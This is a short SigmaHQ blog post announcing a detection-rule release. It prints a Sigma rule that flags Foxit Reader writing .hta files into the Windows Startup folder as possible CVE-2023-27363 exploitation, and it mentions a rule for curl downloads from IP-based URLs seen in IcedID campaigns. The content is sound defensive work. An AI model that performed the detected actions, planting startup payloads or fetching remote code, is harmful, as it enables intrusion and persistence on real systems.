SigmaHQ Rules Release Highlights — r2023-10-23
<p>Sigma Rule Packages for 23-10-2023 are released and available for <a href="https://github.com/SigmaHQ/sigma/releases/tag/r2023-10-23" rel="noopener ugc nofollow" target="_blank">download</a>. This release saw the addition of <strong>21 new rules</strong>, <strong>17 rule updates </strong>and <strong>24 rule fixes.</strong></p>
<h1>New Rules</h1>
<p>Some highlights for the newer rules include, detections for CVE-2023–27363 (Remote Code Execution in Foxit Reader) based on <code>.hta</code> file creation in the Startup directory.</p>
<pre>
title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
id: 9cae055f-e1d2-4f81-b8a5-1986a68cdd84
status: experimental
description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
references:
- https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363
- https://www.zerodayinitiative.com/advisories/ZDI-23-491/
- https://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/
author: Gregory
date: 2023/10/11
tags:
- attack.persistence
- attack.t1505.001
- cve.2023.27363
logsource:
product: windows
category: file_event
detection:
selection:
Image|endswith: '\FoxitPDFReader.exe'
TargetFilename|contains: '\Microsoft\Windows\Start Menu\Programs\Startup\'
TargetFilename|endswith: '.hta'
condition: selection
falsepositives:
- Unknown
level: high</pre>
<p>A generic rule that detects usage of curl to download files from IP based URLs as <a href="https://github.com/pr0xylife/IcedID/blob/main/icedID_09.28.2023.txt" rel="noopener ugc nofollow" target="_blank">seen</a> being abused in the <a href="https://tria.ge/230928-shv6tsdf67/behavioral1" rel="noopener ugc nofollow" target="_blank">wild</a></p>
<p><a href="https://blog.sigmahq.io/sigmahq-rule-release-highlights-r2023-10-23-56eb16a3a882"><strong>Read More</strong></a></p>